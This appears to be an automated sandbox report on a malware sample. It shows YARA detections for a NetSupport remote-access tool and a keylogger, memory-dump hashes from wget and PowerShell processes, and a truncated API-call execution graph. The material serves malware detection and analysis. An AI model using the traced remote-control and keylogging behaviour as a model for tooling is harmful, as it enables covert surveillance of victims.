                                                                                                                                                                                                  MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000000.69327908302.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.69329343216.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Reset < >
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000003.68845135726.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, Offset: 02DEA000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_3_2dea000_wget.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: G$#G$&G$)G$,G$/G$1G$4G$7G$:G$=G$PF$VF$YF$\F$G$G$G$G
                                                                                                                                                                                                    • API String ID: 0-2561612022
                                                                                                                                                                                                    • Opcode ID: b3c34a90275a83a8efdf7654a5b5920babae0af2277f0927f59b218a351b2030
                                                                                                                                                                                                    • Instruction ID: dd0dcabccdb073fb4218a958d3eae974ea224aa3c1b90a64a2d585620d157fcf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3c34a90275a83a8efdf7654a5b5920babae0af2277f0927f59b218a351b2030
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3372A79680E7C05FE7138B745CAA6903FB16E27214B5F45DBC8C9CF6A3E248095AC367
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 0cca330101bc66208ea8a33cdfb6c132c600ea3fc7f82beae0c3fc3e6a29079b
                                                                                                                                                                                                    • Instruction ID: d4e7168fd3fab04e56ef49eff08647e3e9a92f27ddef2f64c12ded6150435a77
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cca330101bc66208ea8a33cdfb6c132c600ea3fc7f82beae0c3fc3e6a29079b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C5258B1702205CFCB249F78E8146AABBE2AF86319F14C0AAD545DF251DB35DD82CB91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 745b8955e843394df61c7289f2ca8e999c4041e8155f6875ba653677166708ef
                                                                                                                                                                                                    • Instruction ID: 22836f3aa07c095da5572c2d449a13e4cf82c19154bd94042764cd5ab93416dc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 745b8955e843394df61c7289f2ca8e999c4041e8155f6875ba653677166708ef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2125CB5705201CFCB259B78E4117ABBFA29FC2215F25C0BAD505EF252CA35E982C7A1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: d6e539afbd519a4846d4e9b2332d1000bec9b277c3f30597ffd71a78877eab9d
                                                                                                                                                                                                    • Instruction ID: b02473a0b772b9bcc608bd38bfd279ef6e281a2390e9538117ec7047e2953247
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6e539afbd519a4846d4e9b2332d1000bec9b277c3f30597ffd71a78877eab9d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAB12871702205CFDB249F69E4507AABBE2BFC5225F14D0FAD6498F251DA30C981CB92
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69140593168.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_4f40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 0174a8180f857a34919426992e941ee660a72e79190d0cc5bbd8444e824c4e6a
                                                                                                                                                                                                    • Instruction ID: e20c710cad75ae015e754cb2b9b0df22eca72ee13a07ab83157ec212c78800af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0174a8180f857a34919426992e941ee660a72e79190d0cc5bbd8444e824c4e6a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9691B374A002498FCB15CF58C4949AEFFB1FF88310B2585A9E955AB3A5C735FC52CB90
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 4ceb677f36a5371270bed37eaf7f2dd5775978002f0287c7a7313a185c403a66
                                                                                                                                                                                                    • Instruction ID: a83ac8dc9d5de3e880134ac7387ff647737cf837285e91f41559358ee600287e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ceb677f36a5371270bed37eaf7f2dd5775978002f0287c7a7313a185c403a66
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C713AF5B02242CFCB249F78E4047AA7BE1AF87259F14907AC505DF285EB35C991CBA1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: b54fb0139ab1954ff09ad32c16ad2ea1aefe0d2026dcb46067feb86dcdbbcbfc
                                                                                                                                                                                                    • Instruction ID: e161be96ba9fd2e5541d8f201f3f5968e39b2c596cd0c09c593018b279dd439c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b54fb0139ab1954ff09ad32c16ad2ea1aefe0d2026dcb46067feb86dcdbbcbfc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6410AF5702201CFDF249F64A4459AB7BB2AF82259F1680E6D504BF253C635E981CB61
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69140593168.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_4f40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: eb5cd65de5704d66564245602ae1b563e13b6a737f7d97c97803e6846adfcc83
                                                                                                                                                                                                    • Instruction ID: d8f1f286c75059a0c2e74e6783235d16957ab6faef9dad3399f111af58fb4e79
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb5cd65de5704d66564245602ae1b563e13b6a737f7d97c97803e6846adfcc83
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64413D74A005098FCB15CF58C494AAEFBB1FF88314B2585A9E9159B365C732FD52CB90
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 86dbc1061cf765f7f8b8843dfdbc1eb0f7c59cbb95036474ce1e4114f9da546c
                                                                                                                                                                                                    • Instruction ID: ba5bdd3a54f2252af6100968d8e525d77a1841dbfa66ffa81e7a91aeed0816af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86dbc1061cf765f7f8b8843dfdbc1eb0f7c59cbb95036474ce1e4114f9da546c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31A6B1602206DFCB24CF69E444BAAB7F2BB81329F19D0F5D6188B254D730D9C1DBA1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: d067eba5fcce0f2805fe20d7c565ca05f5f17ae20860898601fafd1545d81710
                                                                                                                                                                                                    • Instruction ID: 10827152cd95baa15430d68d93c395ea80dd9896ace9dfcc34ddf8364cb78f55
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d067eba5fcce0f2805fe20d7c565ca05f5f17ae20860898601fafd1545d81710
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13319EF2A02706CFDF248F19E944BA6B7F1BF47219F08E0A6E9058B251D371D990DB91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 5037976d74e0c6c6db85cd842400e55537c78ccb2c521e708cfc288b1ed3e137
                                                                                                                                                                                                    • Instruction ID: 54259f4356388e36f66753947ee1579cbd25838591900ec979680ba6be80029e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5037976d74e0c6c6db85cd842400e55537c78ccb2c521e708cfc288b1ed3e137
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C62104F5706282CFCF555F24A8003B57BA1AF8760AF1540AAC911DB1C8DB35CA81C7A2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69140593168.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_4f40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 1d0756efdcf513ce99f9e0f754af569eea1ab120f6e49ec9423f6f588ca69947
                                                                                                                                                                                                    • Instruction ID: 7ca16e46d0c98898d7490e1c37d2817e0d73d61ebfa4908e8c401d232f5b96ef
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d0756efdcf513ce99f9e0f754af569eea1ab120f6e49ec9423f6f588ca69947
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80215E74A042098FCB00DF98C4809AAFBB1FF89310B14809AD809EB352C730FD42CBA1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69140593168.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_4f40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: c832f03a037aaa08e1dde566ff0cdd00821b059c21f82174a8364e240bd34d4a
                                                                                                                                                                                                    • Instruction ID: 006cfe8480a5347c19e455316f5425eb77f1051ce08809885e6acf9170a0d4c9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c832f03a037aaa08e1dde566ff0cdd00821b059c21f82174a8364e240bd34d4a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD212974A052498FCB04DF98C8809AAFBB1FF89310B158599E909EB352C731ED42CFA1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 9494a329715e127b71e375e1e394910960211f9ca35915119f0728aabf244f90
                                                                                                                                                                                                    • Instruction ID: ccee28c258246656167cf732c1ef3bfbee3b84b444e6a9c7e7818587ee57043d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9494a329715e127b71e375e1e394910960211f9ca35915119f0728aabf244f90
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC01F5722093804FC6216FBCAC144EABF65DF83234724479BE1A1CF6D2C6169803CBE1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69140593168.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_4f40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: efe778e508dd67d45c208c7765453e36aeda8e71567438c65e49d3e987fb5e0e
                                                                                                                                                                                                    • Instruction ID: c3383517065ac0ccd9bfa7e50b992cd3efd6c8fd3554a487e67a6cc7a115158f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: efe778e508dd67d45c208c7765453e36aeda8e71567438c65e49d3e987fb5e0e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8801D66120E3C51FC7038F38A864AAA3F695F9B321B1940DBE5C8CF193C976481AC731
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69139991540.0000000004E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E3D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_4e3d000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: f218447717a1e516e36a3ae7de554063e0c6da3571918a80c2b79f7c7f9abc1c
                                                                                                                                                                                                    • Instruction ID: 74c3435d3c64bf60b02ea19b1bc05052b4639e423667beb13fbda99d32d391a8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f218447717a1e516e36a3ae7de554063e0c6da3571918a80c2b79f7c7f9abc1c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8401406200E3C05EE7138B259C94B52BFB4DF53625F1981DBD8888F193C2695849CB72
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69139991540.0000000004E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E3D000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_4e3d000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: a911d25ffacc12f2b8ed63a9382109f365953225e1684ab15562d680e09aba3d
                                                                                                                                                                                                    • Instruction ID: 014799702a1e7213679210f6825caf8766642d3bfbf83cf1727988cd8a5a59da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a911d25ffacc12f2b8ed63a9382109f365953225e1684ab15562d680e09aba3d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7401F7315053409AE7224F25DC88FA2BF98DF41776F18C11AFC484B142D679A942CEB1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69140593168.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_4f40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: a0955a6b2538651efb10362b470bfc320173d9bc188fd7e24d5e9ae985849baf
                                                                                                                                                                                                    • Instruction ID: 83437943a032ca2e7c28edee1a05f4a4ffef9a27dd698469a315bf8c83fa66d9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0955a6b2538651efb10362b470bfc320173d9bc188fd7e24d5e9ae985849baf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39E0D8727152965FC7064F2CE8248BE3F65AFCE361304807FF549CB151CA70881287A0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 885aa945eee664cc464724b7c281426763c83564cbff282e2eb020fae1add4f4
                                                                                                                                                                                                    • Instruction ID: 4ef7151b1aa24ad806d1c3f0acece66c7209ee433eb3abb4741c3c19c701fb74
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 885aa945eee664cc464724b7c281426763c83564cbff282e2eb020fae1add4f4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85E092712007549FC9307FBD9C0845A7E659F823747604718E2724FAC0CA66A80287D1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: d8($d8($A($A(
                                                                                                                                                                                                    • API String ID: 0-631369536
                                                                                                                                                                                                    • Opcode ID: cde791db028d4033682d0329cc000e23bacb46ecb15bf4f59b4dd290a55a29bf
                                                                                                                                                                                                    • Instruction ID: ab7e94295a4524c06c5ca6ee720e1c41685966e856b86757a1802b7327e0c580
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cde791db028d4033682d0329cc000e23bacb46ecb15bf4f59b4dd290a55a29bf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 984137717063458FCB25ABB9E4107AABFA5AFD6215F24C0BFC445EB252DA31C882C791

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:5%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:6.8%
                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                    Total number of Limit Nodes:104
                                                                                                                                                                                                    execution_graph 82997 11025b00 82998 1110c760 82997->82998 82999 1110c781 82998->82999 83000 1110c76c 82998->83000 83001 1110c794 82998->83001 83006 1110c6b0 82999->83006 83000->83001 83003 1110c6b0 280 API calls 83000->83003 83005 1110c775 83003->83005 83004 1110c788 83007 1110c6f4 EnterCriticalSection 83006->83007 83008 1110c6df InitializeCriticalSection 83006->83008 83011 1110c715 83007->83011 83008->83007 83009 1110c743 LeaveCriticalSection 83009->83004 83011->83009 83013 11088520 83011->83013 83030 1110c650 83011->83030 83014 11088558 83013->83014 83015 1108852a 83013->83015 83017 1110c650 4 API calls 83014->83017 83036 1110c420 83015->83036 83019 11088564 83017->83019 83057 110883c0 83019->83057 83022 11088549 83056 11088380 6 API calls 83022->83056 83026 11088550 83026->83011 83027 11088578 83063 11087900 InterlockedDecrement 83027->83063 83029 1108857d 83029->83011 83031 1110c667 EnterCriticalSection 83030->83031 83032 1110c65e GetCurrentThreadId 83030->83032 83033 1110c67e 83031->83033 83032->83031 83034 1110c685 LeaveCriticalSection 83033->83034 83035 1110c698 LeaveCriticalSection 83033->83035 83034->83011 83035->83011 83037 1110c43e 83036->83037 83038 1110c473 83037->83038 83039 1110c447 wsprintfA 83037->83039 83064 1115e4d1 83038->83064 83072 110290f0 261 API calls 83039->83072 83043 11088534 InterlockedIncrement 83044 1110ca30 GetCurrentThreadId EnterCriticalSection 83043->83044 83045 1110ca86 83044->83045 83046 1110ca94 83045->83046 83047 1110c6b0 277 API calls 83045->83047 83074 1113a920 83046->83074 83047->83046 83049 1110caae 83082 1106cf80 35 API calls 83049->83082 83051 1110cabb 83052 1110cac1 83051->83052 83053 1110cad8 LeaveCriticalSection 83051->83053 83083 110290f0 261 API calls 83052->83083 83053->83022 83056->83026 83058 1110c650 4 API calls 83057->83058 83059 110883d0 83058->83059 83060 110883f3 83059->83060 83061 110883e2 UnhookWindowsHookEx 83059->83061 83062 1110cb00 38 API calls 83060->83062 83061->83060 83062->83027 83063->83029 83065 1115e4d9 83064->83065 83066 1115e4db IsDebuggerPresent 83064->83066 83065->83043 83073 11173e07 83066->83073 83069 11168469 SetUnhandledExceptionFilter UnhandledExceptionFilter 83070 11168486 83069->83070 83071 1116848e GetCurrentProcess TerminateProcess 83069->83071 83070->83071 83071->83043 83073->83069 83075 1110c420 261 API calls 83074->83075 83076 1113a931 83075->83076 83077 1113a93c 83076->83077 83084 1115e96a 34 API calls 83076->83084 83077->83049 83079 1113a97e 83085 1115edc1 RaiseException 83079->83085 83081 1113a993 83082->83051 83084->83079 83085->83081 83086 11141510 83092 11141523 83086->83092 83089 1114158a 83090 11141545 GetLastError 83091 11141550 Sleep 83090->83091 83090->83092 83093 1116076b 139 API calls 83091->83093 83092->83089 83092->83090 83095 11141430 ExpandEnvironmentStringsA 83092->83095 83108 1116076b 83092->83108 83094 11141562 83093->83094 83094->83089 83094->83092 83096 11141467 83095->83096 83097 11141484 83096->83097 83098 1114149e 83096->83098 83106 11141474 83096->83106 83100 11141495 GetModuleFileNameA 83097->83100 83120 11141240 83098->83120 83101 111414a4 83100->83101 83144 11080be0 83101->83144 83103 111414f8 83105 1115e4d1 5 API calls 83103->83105 83107 11141506 83105->83107 83111 1113e8f0 83106->83111 83107->83092 83446 111606af 83108->83446 83110 1116077d 83110->83092 83112 1113e8fa 83111->83112 83113 1113e8fc 83111->83113 83112->83103 83148 1110c4a0 83113->83148 83115 1113e922 83116 1113e92b 83115->83116 83117 1113e949 83115->83117 83116->83103 83154 110290f0 261 API calls 83117->83154 83121 11141262 83120->83121 83124 11141279 83120->83124 83177 110290f0 261 API calls 83121->83177 83126 111412ac GetModuleFileNameA 83124->83126 83134 11141407 83124->83134 83125 1115e4d1 5 API calls 83127 11141423 83125->83127 83128 11080be0 IsDBCSLeadByte 83126->83128 83127->83101 83129 111412c1 83128->83129 83130 111412d1 SHGetFolderPathA 83129->83130 83143 111413b8 83129->83143 83132 111412fe 83130->83132 83136 1114131d SHGetFolderPathA 83130->83136 83131 1113e8f0 258 API calls 83131->83134 83135 11141304 83132->83135 83132->83136 83134->83125 83178 110290f0 261 API calls 83135->83178 83137 11141352 83136->83137 83156 1102a250 83137->83156 83143->83131 83143->83143 83145 11080bf3 83144->83145 83146 11080c0a 83145->83146 83445 11080a30 IsDBCSLeadByte 83145->83445 83146->83106 83149 1110c4ae 83148->83149 83150 1110c4b7 83149->83150 83151 1110c4ce 83149->83151 83155 110290f0 261 API calls 83150->83155 83151->83115 83179 11028290 83156->83179 83158 1102a25e 83159 11140ce0 83158->83159 83160 11140d6a 83159->83160 83161 11140ceb 83159->83161 83160->83143 83161->83160 83162 11140cfb GetFileAttributesA 83161->83162 83163 11140d15 83162->83163 83164 11140d07 83162->83164 83418 11161dd7 83163->83418 83164->83143 83167 11080be0 IsDBCSLeadByte 83168 11140d26 83167->83168 83169 11140ce0 35 API calls 83168->83169 83175 11140d43 83168->83175 83170 11140d36 83169->83170 83171 11140d4c 83170->83171 83172 11140d3e 83170->83172 83174 1115f3b5 23 API calls 83171->83174 83173 1115f3b5 23 API calls 83172->83173 83173->83175 83176 11140d51 CreateDirectoryA 83174->83176 83175->83143 83176->83175 83180 110282b3 83179->83180 83181 110288fb 83179->83181 83182 11028370 GetModuleFileNameA 83180->83182 83191 110282e8 83180->83191 83184 11028997 83181->83184 83185 110289aa 83181->83185 83183 11028391 83182->83183 83190 1116076b 139 API calls 83183->83190 83187 1115e4d1 5 API calls 83184->83187 83186 1115e4d1 5 API calls 83185->83186 83189 110289bb 83186->83189 83188 110289a6 83187->83188 83188->83158 83189->83158 83192 1102836b 83190->83192 83191->83191 83193 1116076b 139 API calls 83191->83193 83192->83181 83206 11026500 49 API calls 83192->83206 83193->83192 83195 110283e4 83202 11028865 83195->83202 83207 1115f5b7 83195->83207 83198 110283f5 83198->83202 83211 11026500 49 API calls 83198->83211 83200 11028430 83200->83202 83212 11026500 49 API calls 83200->83212 83214 11160535 83202->83214 83204 11160e4e 81 API calls 83205 11028453 83204->83205 83205->83202 83205->83204 83213 11026500 49 API calls 83205->83213 83206->83195 83208 1115f5a1 83207->83208 83227 1115fe1b 83208->83227 83211->83200 83212->83205 83213->83205 83215 11160541 83214->83215 83216 11160553 83215->83216 83217 11160568 83215->83217 83312 11165abf 23 API calls 83216->83312 83224 11160563 83217->83224 83292 11167769 83217->83292 83219 11160558 83313 1116a6d4 11 API calls 83219->83313 83222 11160581 83296 111604c8 83222->83296 83224->83181 83228 1115fe34 83227->83228 83231 1115fbf0 83228->83231 83243 1115fb69 83231->83243 83233 1115fc14 83251 11165abf 23 API calls 83233->83251 83236 1115fc19 83252 1116a6d4 11 API calls 83236->83252 83238 1115f5b2 83238->83198 83240 1115fc4a 83241 1115fc91 83240->83241 83253 1116d3d5 75 API calls 83240->83253 83241->83238 83254 11165abf 23 API calls 83241->83254 83244 1115fb7c 83243->83244 83246 1115fbc9 83243->83246 83255 11167f85 83244->83255 83246->83233 83246->83240 83250 1115fba9 83250->83246 83273 1116cf14 64 